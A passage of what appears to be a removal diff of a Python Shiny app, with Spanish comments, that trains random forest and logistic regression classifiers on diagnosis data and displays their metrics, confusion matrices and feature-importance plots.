node.get_text().split("\n") - first_value = 0 - second_value = 0 - value_index = 0 - for idx, string in enumerate(new_texts): - values_split = re.split('(\d+)', string) - if len(values_split) > 0 and values_split[0] == 'value = [': - first_value = int(values_split[1]) - second_value = int(values_split[3]) - value_index = idx - - if value_index != 0: - new_texts[value_index - 1] = 'samples = ' + str(first_value + second_value) - - final_string = '
      '.join(new_texts) - - texts.append(final_string) - - for x, y in coords: - coords_x.append(x) - coords_y.append(y) - - coords_x_list.append(coords_x) - coords_y_list.append(coords_y) - texts_list.append(texts) - - ranForest_tree_plot_x_coords.set(coords_x_list) - ranForest_tree_plot_y_coords.set(coords_y_list) - ranForest_tree_plot_texts.set(texts_list) - - random_forest_last_estimators_num.set(n_estimators) - -#################################### EFECTOS REACTIVOS ####################################### - - # GENERAR EL MODELO DE RANDOM FOREST Y REALIZAR TODOS LOS CÁLCULOS - @reactive.Effect - @reactive.event(input.generate_random_forest) - def _(): - ui.remove_ui("#ran-forest-warning") - - # Obtener el tamaño de la separación de entrenamiento y la longitud de la base de datos para comprobaciones: - test_size_split = input.test_split_value() - df_len = len(clean_df) - - # Comprobaciones previas. Si algo falla, el modelo no se calcula y se resetean los resultados anteriores para no causar confusión: - if ran_forest_previous_checks(test_size_split, df_len) == True: - # Cerrar todas las visualizaciones - ui.update_switch("view_variable_importance_ran_forest", value=False) - ui.update_switch("conf_mat_ran_forest_switch", value=False) - ui.update_switch("view_tree_ran_forest_switch", value=False) - # Resetear todos los resultados - reset_ran_forest_result_values() - empty_ran_forest_feature_importance_df() - random_forest_last_estimators_num.set(0) - random_forest_execution_counter.set(0) - return - - # Arreglar valores None para poder ser aceptados por el modelo: - max_depth_val = input.ran_forest_max_depth() - if max_depth_val == 0: - max_depth_val = None - - max_features_value = input.ran_forest_max_features() - if max_features_value == 'None': - max_features_value = None - - n_estimators_ran_forest = input.ran_forest_n_estimators() - - # Crear el modelo de random forest - ran_forest_model = RandomForestClassifier(n_estimators=n_estimators_ran_forest, - criterion=input.ran_forest_criterion(), - max_depth=max_depth_val, - min_samples_split=input.ran_forest_min_samples_split(), - min_samples_leaf=input.ran_forest_min_samples_leaf(), - max_features=max_features_value) - # bootstrap=False # Boostrap sampling causa problemas al representar los árboles, su número de samples no - # corresponde a la suma de los valores de cada tipo. Sin embargo, si se desactiva, todos los árboles generados - # son exactamente iguales. - - # Lista de las características que usamos: - features_list = list(input.ran_forest_features_sel()) - - # Fit y predicciónes del modelo. Guardado de todos los datos - classification_model_random_forest(ran_forest_model,clean_df,test_size_split,features_list,outcome_var,n_estimators_ran_forest) - - # Variables importantes y guardado de sus resultados - empty_ran_forest_feature_importance_df() - ran_forest_feat_imp = pd.Series(ran_forest_model.feature_importances_, index=features_list).sort_values(ascending=False) - ran_forest_feat_imp_df.insert(0, "Característica", ran_forest_feat_imp.index) - ran_forest_feat_imp_df.insert(1, "Valor", ran_forest_feat_imp.values.round(decimals=3) * 100) - - random_forest_execution_counter.set(random_forest_execution_counter.get()+1) - - # MOSTRAR EL WIDGET DE IMPORTANCIA DE VARIABLES DEL RANDOM FOREST - @reactive.Effect - def _(): - var_imp_ran_forest_switch = input.view_variable_importance_ran_forest() - if var_imp_ran_forest_switch == True: - ui.remove_ui("#var-imp-ran-forest-plot") - if random_forest_execution_counter.get() > 0: - var_imp_ran_forest_plot = output_widget("widget_ran_forest_var_imp") - ui.insert_ui( - ui.div({"id": "var-imp-ran-forest-plot"}, var_imp_ran_forest_plot, style = "width:100%; overflow-x:auto; overflow-y:auto;"), - selector="#var_imp_ran_forest", - where="beforeEnd", - ) - else: - ui.insert_ui( - ui.div({"id": "var-imp-ran-forest-plot"}, feat_imp_warning_ui("ran_forest_warnings")), - selector="#var_imp_ran_forest", - where="beforeEnd", - ) - else: - ui.remove_ui("#var-imp-ran-forest-plot") - - # DESELECCIONAR VARIABLES POCO IMPORTANTES DEL RANDOM FOREST - @reactive.Effect - @reactive.event(input.deselect_not_imp_vars_ran_forest) - def _(): - minimum_importance = input.minimum_importance_ran_forest() - important_columns_auto = [feature["Característica"] for idx, feature in ran_forest_feat_imp_df.iterrows() if (feature["Valor"] >= minimum_importance)] - ui.update_checkbox_group("ran_forest_features_sel", selected=important_columns_auto) - - # MOSTRAR LA MATRIZ DE CONFUSIÓN DEL RANDOM FOREST - @reactive.Effect - def _(): - conf_mat_ran_forest_switch = input.conf_mat_ran_forest_switch() - if conf_mat_ran_forest_switch == True: - ui.remove_ui("#ran-forest-conf-mat-train") - ui.remove_ui("#ran-forest-conf-mat-test") - if random_forest_execution_counter.get() > 0: - ran_forest_conf_mat_train = output_widget("widget_ran_forest_conf_mat_train") - ui.insert_ui( - ui.div({"id": "ran-forest-conf-mat-train"}, ran_forest_conf_mat_train, style = "width:100%; height:300px; overflow-x:auto; overflow-y:auto;"), - selector="#ran_forest_conf_matrix_train", - where="beforeEnd", - ) - ran_forest_conf_mat_test = output_widget("widget_ran_forest_conf_mat_test") - ui.insert_ui( - ui.div({"id": "ran-forest-conf-mat-test"}, ran_forest_conf_mat_test, style = "width:100%; height:300px; overflow-x:auto; overflow-y:auto;"), - selector="#ran_forest_conf_matrix_test", - where="beforeEnd", - ) - else: - ui.insert_ui( - ui.div({"id": "ran-forest-conf-mat-train"}, conf_matrix_warning_ui("ran_forest_warnings")), - selector="#ran_forest_conf_matrix", - where="beforeEnd", - ) - else: - ui.remove_ui("#ran-forest-conf-mat-train") - ui.remove_ui("#ran-forest-conf-mat-test") - - # MOSTRAR EL WIDGET DEL RANDOM FOREST - @reactive.Effect - def _(): - view_tree_ran_forest_switch = input.view_tree_ran_forest_switch() - if view_tree_ran_forest_switch == True: - ui.remove_ui("#ran-forest-view-img") - ui.remove_ui("#ran-forest-view-img-foot") - if random_forest_execution_counter.get() > 0: - ran_forest_view = output_widget("widget_ran_forest_view") - ui.insert_ui( - ui.div({"id": "ran-forest-view-img"}, ran_forest_view, style = "width:100%; height:1000px; overflow-x:auto; overflow-y:auto;"), - selector="#ran_forest_view", - where="beforeEnd", - ) - ran_forest_view_foot = ui.output_text("random_forest_view_foot_txt") - ui.insert_ui( - ui.div({"id": "ran-forest-view-img-foot"}, ran_forest_view_foot, style="color:grey; font-style:italic; text-align:center; font-size: 0.7em;"), - selector="#ran_forest_view", - where="beforeEnd", - ) - - else: - view_tree_ran_forest_warning = ui.output_text("random_forest_warning_view_txt"), - ui.insert_ui( - ui.div({"id": "ran-forest-view-img"}, view_tree_ran_forest_warning, style="color:red; font-style:italic; margin-top:20px; padding: 10px; background: #f7f7f7; border-radius: 10px;"), - selector="#ran_forest_view", - where="beforeEnd", - ) - else: - ui.remove_ui("#ran-forest-view-img") - ui.remove_ui("#ran-forest-view-img-foot") - - # ACTUALIZAR EL SELECTOR DE ÁRBOL DE DECISIÓN PARA MOSTRAR - @reactive.Effect - def _(): - n_estimators = random_forest_last_estimators_num.get() - new_list = list() - for index in range(0, min(5, n_estimators)): - new_list.append(index) - ui.update_select("view_tree_ran_forest_number", choices=new_list) - -#################################### WIDGETS ################################################# - - # WIDGET DE LA IMPORTANCIA DE LAS VARIABLES DEL RANDOM FOREST - @output - @render_widget - def widget_ran_forest_var_imp(): - #Variables a las que reaccionar: - random_forest_execution_counter.get() - input.view_variable_importance_ran_forest() - - if len(ran_forest_feat_imp_df) == 0: - return go.Figure() - - fig = go.Figure(data=[go.Bar(x = ran_forest_feat_imp_df["Valor"], - y = ran_forest_feat_imp_df["Característica"], - orientation='h', - name="", - marker=dict(color = ran_forest_feat_imp_df["Valor"], - colorscale=px.colors.sequential.Viridis_r)) - ]) - - fig.update_layout(autosize=True, - height=max(280, 40*len(ran_forest_feat_imp_df)), - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(hovertemplate='%{y} : %{x}%') - - fig.update_yaxes(autorange="reversed") - - return fig - - # WIDGET MATRIZ DE CONFUSIÓN ENTRENAMIENTO DEL RANDOM FOREST - @output - @render_widget - def widget_ran_forest_conf_mat_train(): - cm_map = ranForest_tree_conf_mat_train.get() - fig = go.Figure(data=[go.Heatmap(z=cm_map, - xgap = 1, - ygap = 1, - colorscale=px.colors.sequential.Teal, - name="") - ]) - - fig.update_xaxes( - autorange="reversed", - ) - - fig.update_layout(title="Matriz de confusión: datos entrenamiento", - xaxis_title="Valores reales", - yaxis_title="Valores predichos", - xaxis = dict( - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - yaxis = dict( - scaleanchor = 'x', - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - autosize=True, - height=300, - width=400, - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(text=cm_map, - texttemplate="%{text}", - hovertemplate='Valor real: %{x}
      Valor predicho: %{y}
      Cantidad: %{z}') - - return fig - - # WIDGET MATRIZ DE CONFUSIÓN TESTING DEL RANDOM FOREST - @output - @render_widget - def widget_ran_forest_conf_mat_test(): - cm_map = ranForest_tree_conf_mat_test.get() - fig = go.Figure(data=[go.Heatmap(z=cm_map, - xgap = 1, - ygap = 1, - colorscale=px.colors.sequential.Teal, - name="") - ]) - - fig.update_xaxes( - autorange="reversed", - ) - - fig.update_layout(title="Matriz de confusión: datos test", - xaxis_title="Valores reales", - yaxis_title="Valores predichos", - xaxis = dict( - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - yaxis = dict( - scaleanchor = 'x', - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - autosize=True, - height=300, - width=400, - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(text=cm_map, - texttemplate="%{text}", - hovertemplate='Valor real: %{x}
      Valor predicho: %{y}
      Cantidad: %{z}') - - return fig - - # WIDGET VISUALIZACIÓN DEL RANDOM FOREST - @output - @render_widget - def widget_ran_forest_view(): - # Variables a las que reaccionar: - random_forest_execution_counter.get() - - num_tree = int(input.view_tree_ran_forest_number()) - - img_path = str(Path(__file__).parent / "RanForests") + "\\" + str(session.id) + '_ran_forest' + str(num_tree) + '.jpg' - img_src = Image.open( img_path ) - - fig = go.Figure() - - fig.add_trace( - go.Scatter( - x=ranForest_tree_plot_x_coords.get()[num_tree], - y=ranForest_tree_plot_y_coords.get()[num_tree], - text=ranForest_tree_plot_texts.get()[num_tree], - mode="markers", - marker=dict( - color="white", - size=60, - opacity=0.1, - ), - name="", - ) - ) - - # Configurar ejes - fig.update_xaxes( - visible=False, - range=[0,1], - ) - - fig.update_yaxes( - visible=False, - range=[0,1], - # el atributo scaleanchor asegura que la relación de aspecto se mantiene constante - scaleanchor="x" - ) - - fig.add_layout_image( - dict( - x=-0.02, - sizex=1.04, - y=1.01, - sizey=1.02, - xref="x", - yref="y", - opacity=1.0, - layer="above", - sizing="stretch", - source=img_src) - ) - - fig = fig.update_traces(hovertemplate='%{text}') - - fig.update_layout(autosize=True, - height=1000, - margin=dict(l=20, r=20, t=40, b=20),) - - return fig - -#################################### TEXTOS ################################################## - - # RESULTADOS - @output - @render.text - def random_forest_accuracy(): - if accuracy_ranForest.get() == -1: - return "Exactitud: " - return "Exactitud: " + str(accuracy_ranForest.get()) + "%" - - @output - @render.text - def random_forest_recall(): - if recall_ranForest.get() == -1: - return "Sensibilidad o TVP: " - return "Sensibilidad o TVP: " + str(recall_ranForest.get()) + "%" - - @output - @render.text - def random_forest_precision(): - if precision_ranForest.get() == -1: - return "Precisión: " - return "Precisión: " + str(precision_ranForest.get()) + "%" - - @output - @render.text - def random_forest_f1(): - if f1_ranForest.get() == -1: - return "F1 Score: " - return "F1 Score: " + str(f1_ranForest.get()) + "%" - - @output - @render.text - def random_forest_accuracy_test(): - if accuracy_ranForest_test.get() == -1: - return "Exactitud: " - return "Exactitud: " + str(accuracy_ranForest_test.get()) + "%" - - @output - @render.text - def random_forest_recall_test(): - if recall_ranForest_test.get() == -1: - return "Sensibilidad o TVP: " - return "Sensibilidad o TVP: " + str(recall_ranForest_test.get()) + "%" - - @output - @render.text - def random_forest_precision_test(): - if precision_ranForest_test.get() == -1: - return "Precisión: " - return "Precisión: " + str(precision_ranForest_test.get()) + "%" - - @output - @render.text - def random_forest_f1_test(): - if f1_ranForest_test.get() == -1: - return "F1 Score: " - return "F1 Score: " + str(f1_ranForest_test.get()) + "%" - - - # WARNING VISUALIZACIÓN ÁRBOL - @output - @render.text - def random_forest_warning_view_txt(): - return "No se puede mostrar uno de los árboles de decisión sin haber creado el modelo!" - - @output - @render.text - def random_forest_view_foot_txt(): - return "Nota: Los valores de samples mostrados en la imagen son erroneos. En los bocadillos de información son correctos, son la suma de samples." - -#################################### UPDATES Y OTROS ######################################### - - # ACTUALIZAR CHECKBOX ÁRBOL DE DECISIÓN - def update_ranForest_checkbox_group(): - column_dict = {} - for col in clean_df.columns: - if col != "diagnosis": - column_dict[col] = col - ui.update_checkbox_group("ran_forest_features_sel", choices=column_dict, selected=list(column_dict)) - - -############################################################################################## -################################### REGRESIÓN LOGÍSTICA ###################################### -############################################################################################## - -#################################### IMPORTANTES ############################################# - - # COMPROBACIONES PREVIAS DE LA REGRESIÓN LOGÍSTICA - def log_reg_previous_checks(test_size_split, df_len): - if diagnosis_data_converted.get() == False: - ui.insert_ui( - ui.div({"id": "log-reg-warning"}, diagnosis_warning_ui("log_reg_warnings")), - selector="#log_reg_generator", - where="beforeEnd", - ) - return True - - if test_split_done.get() == False: - ui.insert_ui( - ui.div({"id": "log-reg-warning"}, test_split_warning_ui("log_reg_warnings")), - selector="#log_reg_generator", - where="beforeEnd", - ) - return True - - if len(list(input.log_reg_features_sel())) == 0: - ui.insert_ui( - ui.div({"id": "log-reg-warning"}, features_warning_ui("log_reg_warnings")), - selector="#log_reg_generator", - where="beforeEnd", - ) - return True - - if df_len * test_size_split < 1.0: - ui.insert_ui( - ui.div({"id": "log-reg-warning"}, test_split_low_warning_ui("log_reg_warnings")), - selector="#log_reg_generator", - where="beforeEnd", - ) - return True - - if df_len * ( 1 - test_size_split ) < 1.0: - ui.insert_ui( - ui.div({"id": "log-reg-warning"}, test_split_high_warning_ui("log_reg_warnings")), - selector="#log_reg_generator", - where="beforeEnd", - ) - return True - - return False - - # FIT, PREDICCIÓN Y GUARDADO DE DATOS DE LA REGRESIÓN LOGÍSTICA - def classification_model_log_reg(model, data, size_test, predictors, outcome, log_reg_max_iter): - # Crear la división de test y entrenamiento! - data_train, data_test = train_test_split(data, test_size = size_test) - - # Fit del modelo: - model.fit(data_train[predictors],data_train[outcome]) - - if log_reg_max_iter == model.n_iter_[0]: - logistic_regression_warning = ui.output_text("logistic_regression_warning_iters_txt"), - ui.insert_ui( - ui.div({"id": "log-reg-warning"}, logistic_regression_warning, style="color:orange; font-style:italic; margin-top:20px; padding: 10px; background: #f7f7f7; border-radius: 10px;"), - selector="#log_reg_generator", - where="beforeEnd", - ) - - # Hacer predicciones del set de entrenamiento: - predictions = model.predict(data_train[predictors]) - - # Setear los resultados del set de entrenamiento: - accuracy_logReg.set((metrics.accuracy_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - recall_logReg.set((metrics.recall_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - precision_logReg.set((metrics.precision_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - f1_logReg.set((metrics.f1_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - - # Hacer predicciones del set de test: - predictions_test = model.predict(data_test[predictors]) - - # Setear los resultados del set des test: - accuracy_logReg_test.set((metrics.accuracy_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - recall_logReg_test.set((metrics.recall_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - precision_logReg_test.set((metrics.precision_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - f1_logReg_test.set((metrics.f1_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - - # Creación y guardado de la matriz de confusión - cm_train = metrics.confusion_matrix(predictions,data_train[outcome]) - cm_test = metrics.confusion_matrix(predictions_test,data_test[outcome]) - logReg_conf_mat_train.set(cm_train) - logReg_conf_mat_test.set(cm_test) - -#################################### EFECTOS REACTIVOS ####################################### - - # GENERAR EL MODELO DE LA REGRESIÓN LOGÍSTICA Y REALIZAR TODOS LOS CÁLCULOS - @reactive.Effect - @reactive.event(input.generate_logistic_regression) - def _(): - ui.remove_ui("#log-reg-warning") - - # Obtener el tamaño de la separación de entrenamiento y la longitud de la base de datos para comprobaciones: - test_size_split = input.test_split_value() - df_len = len(clean_df) - - # Comprobaciones previas. Si algo falla, el modelo no se calcula y se resetean los resultados anteriores para no causar confusión: - if log_reg_previous_checks(test_size_split, df_len) == True: - # Cerrar todas las visualizaciones - ui.update_switch("view_variable_importance_log_reg", value=False) - ui.update_switch("conf_mat_log_reg_switch", value=False) - ui.update_switch("view_tree_log_reg_switch", value=False) - # Resetear todos los resultados - reset_log_reg_result_values() - empty_log_reg_feature_importance_df() - logistic_regression_execution_counter.set(0) - return - - # Arreglar valores None para poder ser aceptados por el modelo: - log_reg_penalty = input.log_reg_penalty() - if log_reg_penalty == 'None': - log_reg_penalty = None - - log_reg_tolerance = 1 * pow(10, input.log_reg_tol()) - - log_reg_max_iters = input.log_reg_max_iter() - - log_reg_l1_rat = None - if log_reg_penalty == "elasticnet": - log_reg_l1_rat = 0.5 - - # Crear el modelo de regresión logística - log_reg_model = LogisticRegression(penalty=log_reg_penalty, - tol=log_reg_tolerance, - C=input.log_reg_c(), - solver=input.log_reg_solver(), - max_iter=log_reg_max_iters, - l1_ratio=log_reg_l1_rat) - - # Lista de las características que usamos: - features_list = list(input.log_reg_features_sel()) - - # Fit y predicciónes del modelo. Guardado de todos los datos - classification_model_log_reg(log_reg_model,clean_df,test_size_split,features_list,outcome_var,log_reg_max_iters) - - # Variables importantes y guardado de sus resultados - empty_log_reg_feature_importance_df() - log_reg_feat_imp = pd.Series(np.abs(log_reg_model.coef_[0]), index=features_list).sort_values(ascending=False) - # La importancia de las variables en regresión logística no suman 1, lo cambiamos a porcentaje - sum_all_imp_values = log_reg_feat_imp.sum() - log_reg_feat_imp_df.insert(0, "Característica", log_reg_feat_imp.index) - log_reg_feat_imp_df.insert(1, "Valor", (log_reg_feat_imp.values / sum_all_imp_values).round(decimals=3) * 100) - - logistic_regression_execution_counter.set(logistic_regression_execution_counter.get()+1) - - # MOSTRAR EL WIDGET DE IMPORTANCIA DE VARIABLES DE LA REGRESIÓN LOGÍSTICA - @reactive.Effect - def _(): - var_imp_log_reg_switch = input.view_variable_importance_log_reg() - if var_imp_log_reg_switch == True: - ui.remove_ui("#var-imp-log-reg-plot") - if logistic_regression_execution_counter.get() > 0: - var_imp_log_reg_plot = output_widget("widget_log_reg_var_imp") - ui.insert_ui( - ui.div({"id": "var-imp-log-reg-plot"}, var_imp_log_reg_plot, style = "width:100%; overflow-x:auto; overflow-y:auto;"), - selector="#var_imp_log_reg", - where="beforeEnd", - ) - else: - ui.insert_ui( - ui.div({"id": "var-imp-log-reg-plot"}, feat_imp_warning_ui("log_reg_warnings")), - selector="#var_imp_log_reg", - where="beforeEnd", - ) - else: - ui.remove_ui("#var-imp-log-reg-plot") - - # DESELECCIONAR VARIABLES POCO IMPORTANTES DE LA REGRESIÓN LOGÍSTICA - @reactive.Effect - @reactive.event(input.deselect_not_imp_vars_log_reg) - def _(): - minimum_importance = input.minimum_importance_log_reg() - important_columns_auto = [feature["Característica"] for idx, feature in log_reg_feat_imp_df.iterrows() if (feature["Valor"] >= minimum_importance)] - ui.update_checkbox_group("log_reg_features_sel", selected=important_columns_auto) - - # MOSTRAR LA MATRIZ DE CONFUSIÓN DE LA REGRESIÓN LOGÍSTICA - @reactive.Effect - def _(): - conf_mat_log_reg_switch = input.conf_mat_log_reg_switch() - if conf_mat_log_reg_switch == True: - ui.remove_ui("#log-reg-conf-mat-train") - ui.remove_ui("#log-reg-conf-mat-test") - if logistic_regression_execution_counter.get() > 0: - log_reg_conf_mat_train = output_widget("widget_log_reg_conf_mat_train") - ui.insert_ui( - ui.div({"id": "log-reg-conf-mat-train"}, log_reg_conf_mat_train, style = "width:100%; height:300px; overflow-x:auto; overflow-y:auto;"), - selector="#log_reg_conf_matrix_train", - where="beforeEnd", - ) - log_reg_conf_mat_test = output_widget("widget_log_reg_conf_mat_test") - ui.insert_ui( - ui.div({"id": "log-reg-conf-mat-test"}, log_reg_conf_mat_test, style = "width:100%; height:300px; overflow-x:auto; overflow-y:auto;"), - selector="#log_reg_conf_matrix_test", - where="beforeEnd", - ) - else: - ui.insert_ui( - ui.div({"id": "log-reg-conf-mat-train"}, conf_matrix_warning_ui("log_reg_warnings")), - selector="#log_reg_conf_matrix", - where="beforeEnd", - ) - else: - ui.remove_ui("#log-reg-conf-mat-train") - ui.remove_ui("#log-reg-conf-mat-test") - - # ACTUALIZAR PENALTY SEGÚN SOLVER DE LA REGRESIÓN LOGÍSTICA - @reactive.Effect - def _(): - solver = input.log_reg_solver() - if solver == "saga": - ui.update_select("log_reg_penalty", choices={"elasticnet": "Elasticnet (L1 + L2)", "l1": "L1", "l2": "L2 (default)", "None": "None"}) - elif solver == "liblinear": - ui.update_select("log_reg_penalty", choices={"l1": "L1", "l2": "L2 (default)"}) - else: - ui.update_select("log_reg_penalty", choices={"l2": "L2 (default)", "None": "None"}) - -#################################### WIDGETS ################################################# - - # WIDGET DE LA IMPORTANCIA DE LAS VARIABLES DE LA REGRESIÓN LOGÍSTICA - @output - @render_widget - def widget_log_reg_var_imp(): - #Variables a las que reaccionar: - logistic_regression_execution_counter.get() - input.view_variable_importance_log_reg() - - if len(log_reg_feat_imp_df) == 0: - return go.Figure() - - fig = go.Figure(data=[go.Bar(x = log_reg_feat_imp_df["Valor"], - y = log_reg_feat_imp_df["Característica"], - orientation='h', - name="", - marker=dict(color = log_reg_feat_imp_df["Valor"], - colorscale=px.colors.sequential.Viridis_r)) - ]) - - fig.update_layout(autosize=True, - height=max(280, 40*len(log_reg_feat_imp_df)), - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(hovertemplate='%{y} : %{x}%') - - fig.update_yaxes(autorange="reversed") - - return fig - - # WIDGET MATRIZ DE CONFUSIÓN ENTRENAMIENTO DE LA REGRESIÓN LOGÍSTICA - @output - @render_widget - def widget_log_reg_conf_mat_train(): - cm_map = logReg_conf_mat_train.get() - fig = go.Figure(data=[go.Heatmap(z=cm_map, - xgap = 1, - ygap = 1, - colorscale=px.colors.sequential.Teal, - name="") - ]) - - fig.update_xaxes( - autorange="reversed", - ) - - fig.update_layout(title="Matriz de confusión: datos entrenamiento", - xaxis_title="Valores reales", - yaxis_title="Valores predichos", - xaxis = dict( - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - yaxis = dict( - scaleanchor = 'x', - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - autosize=True, - height=300, - width=400, - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(text=cm_map, - texttemplate="%{text}", - hovertemplate='Valor real: %{x}
      Valor predicho: %{y}
      Cantidad: %{z}') - - return fig - - # WIDGET MATRIZ DE CONFUSIÓN TESTING DE LA REGRESIÓN LOGÍSTICA - @output - @render_widget - def widget_log_reg_conf_mat_test(): - cm_map = logReg_conf_mat_test.get() - fig = go.Figure(data=[go.Heatmap(z=cm_map, - xgap = 1, - ygap = 1, - colorscale=px.colors.sequential.Teal, - name="") - ]) - - fig.update_xaxes( - autorange="reversed", - ) - - fig.update_layout(title="Matriz de confusión: datos test", - xaxis_title="Valores reales", - yaxis_title="Valores predichos", - xaxis = dict( - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - yaxis = dict( - scaleanchor = 'x', - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - autosize=True, - height=300, - width=400, - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(text=cm_map, - texttemplate="%{text}", - hovertemplate='Valor real: %{x}
      Valor predicho: %{y}
      Cantidad: %{z}') - - return fig - - -#################################### TEXTOS ################################################## - - # WARNINGS DE LA REGRESIÓN LOGÍSTICA - @output - @render.text - def logistic_regression_warning_iters_txt(): - return "El modelo ha parado porque ha llegado al máximo de iteraciones! Modifica los datos de entrada o aumenta el número máximo de iteraciones." - - # RESULTADOS DE LA REGRESIÓN LOGÍSTICA - @output - @render.text - def logistic_regression_accuracy(): - if accuracy_logReg.get() == -1: - return "Exactitud: " - return "Exactitud: " + str(accuracy_logReg.get()) + "%" - - @output - @render.text - def logistic_regression_recall(): - if recall_logReg.get() == -1: - return "Sensibilidad o TVP: " - return "Sensibilidad o TVP: " + str(recall_logReg.get()) + "%" - - @output - @render.text - def logistic_regression_precision(): - if precision_logReg.get() == -1: - return "Precisión: " - return "Precisión: " + str(precision_logReg.get()) + "%" - - @output - @render.text - def logistic_regression_f1(): - if f1_logReg.get() == -1: - return "F1 Score: " - return "F1 Score: " + str(f1_logReg.get()) + "%" - - @output - @render.text - def logistic_regression_accuracy_test(): - if accuracy_logReg_test.get() == -1: - return "Exactitud: " - return "Exactitud: " + str(accuracy_logReg_test.get()) + "%" - - @output - @render.text - def logistic_regression_recall_test(): - if recall_logReg_test.get() == -1: - return "Sensibilidad o TVP: " - return "Sensibilidad o TVP: " + str(recall_logReg_test.get()) + "%" - - @output - @render.text - def logistic_regression_precision_test(): - if precision_logReg_test.get() == -1: - return "Precisión: " - return "Precisión: " + str(precision_logReg_test.get()) + "%" - - @output - @render.text - def logistic_regression_f1_test(): - if f1_logReg_test.get() == -1: - return "F1 Score: " - return "F1 Score: " + str(f1_logReg_test.get()) + "%" - - # WARNING MATRIZ DE CONFUSIÓN DE LA REGRESIÓN LOGÍSTICA - @output - @render.text - def logistic_regression_warning_conf_matrix_txt(): - return "No se puede mostrar la matriz de confusión de la regresión logística sin haber creado el modelo!" - -#################################### UPDATES Y OTROS ######################################### - - # ACTUALIZAR CHECKBOX DE LA REGRESIÓN LOGÍSTICA - def update_logReg_checkbox_group(): - column_dict = {} - for col in clean_df.columns: - if col != "diagnosis": - column_dict[col] = col - ui.update_checkbox_group("log_reg_features_sel", choices=column_dict, selected=list(column_dict)) - - -############################################################################################## -######################## RESETEAR CLEAN DATAFRAME Y ACCIONES GENERALES ####################### -############################################################################################## - - # RESETEO GENERAL - @reactive.Effect - @reactive.event(input.reset_clean_df) - def _(): - # Resetear la dataframe de datos limpios - reset_clean_df() - - # Vaciar las dataframes de importancia de variables - empty_all_feature_importance_df() - - # Actualizar y cerrar partes necesarias - update_all_selectors() - close_every_ui_after_reset() - - reset_dataframe_counter.set( reset_dataframe_counter.get() + 1 ) - diagnosis_data_converted.set(False) - correlation_execution_counter.set(0) - test_split_done.set(False) - - decision_tree_execution_counter.set(0) - random_forest_execution_counter.set(0) - logistic_regression_execution_counter.set(0) - reset_all_result_values() - - # RESETEAR CLEAN_DF - def reset_clean_df(): - # Vaciar la dataframe limpia - for columnName in clean_df.columns: - clean_df.drop(columnName, axis = 1, inplace=True) - clean_df.drop(clean_df.index, inplace=True) - - # Rellenar la dataframe limpia con los datos originales - for columnName in original_df.columns: - clean_df[columnName] = original_df[columnName] - - # VACIAR TODAS LAS DATAFRAMES DE IMPORTANCIA DE VARIABLES - def empty_all_feature_importance_df(): - # Vaciar la tabla de importancia de variables si es necesario - empty_dec_tree_feature_importance_df() - empty_ran_forest_feature_importance_df() - empty_log_reg_feature_importance_df() - - # Para árbol de decisión - def empty_dec_tree_feature_importance_df(): - if len(dec_tree_feat_imp_df) > 0: - dec_tree_feat_imp_df.drop(["Característica", "Valor"], axis = 1, inplace=True) - dec_tree_feat_imp_df.drop(dec_tree_feat_imp_df.index, inplace=True) - - # Para bosque aleatorio - def empty_ran_forest_feature_importance_df(): - if len(ran_forest_feat_imp_df) > 0: - ran_forest_feat_imp_df.drop(["Característica", "Valor"], axis = 1, inplace=True) - ran_forest_feat_imp_df.drop(ran_forest_feat_imp_df.index, inplace=True) - - # Para regresión logística - def empty_log_reg_feature_importance_df(): - if len(log_reg_feat_imp_df) > 0: - log_reg_feat_imp_df.drop(["Característica", "Valor"], axis = 1, inplace=True) - log_reg_feat_imp_df.drop(log_reg_feat_imp_df.index, inplace=True) - - # ACTUALIZAR SELECTORES Y CHECKBOXES NECESARIOS - def update_all_selectors(): - update_dropIdSelector() - update_decTree_checkbox_group() - update_ranForest_checkbox_group() - update_logReg_checkbox_group() - - # RESET TODAS LAS VARIABLES DE RESULTADOS - def reset_all_result_values(): - #Decision Tree: - reset_dec_tree_result_values() - #Random Forest: - reset_ran_forest_result_values() - #Logistic regression: - reset_log_reg_result_values() - - # RESET TODAS LAS VARIABLES DE RESULTADOS ÁRBOL DECISION - def reset_dec_tree_result_values(): - accuracy_decTree.set(-1) - recall_decTree.set(-1) - precision_decTree.set(-1) - f1_decTree.set(-1) - - accuracy_decTree_test.set(-1) - recall_decTree_test.set(-1) - precision_decTree_test.set(-1) - f1_decTree_test.set(-1) - - # RESET TODAS LAS VARIABLES DE RESULTADOS BOSQUE ALEATORIO - def reset_ran_forest_result_values(): - accuracy_ranForest.set(-1) - recall_ranForest.set(-1) - precision_ranForest.set(-1) - f1_ranForest.set(-1) - - accuracy_ranForest_test.set(-1) - recall_ranForest_test.set(-1) - precision_ranForest_test.set(-1) - f1_ranForest_test.set(-1) - - # RESET TODAS LAS VARIABLES DE RESULTADOS REGRESIÓN LOGÍSTICA - def reset_log_reg_result_values(): - accuracy_logReg.set(-1) - recall_logReg.set(-1) - precision_logReg.set(-1) - f1_logReg.set(-1) - - accuracy_logReg_test.set(-1) - recall_logReg_test.set(-1) - precision_logReg_test.set(-1) - f1_logReg_test.set(-1) - - # CERRAR LAS PARTES DE UI NECESARIAS AL HACER RESET 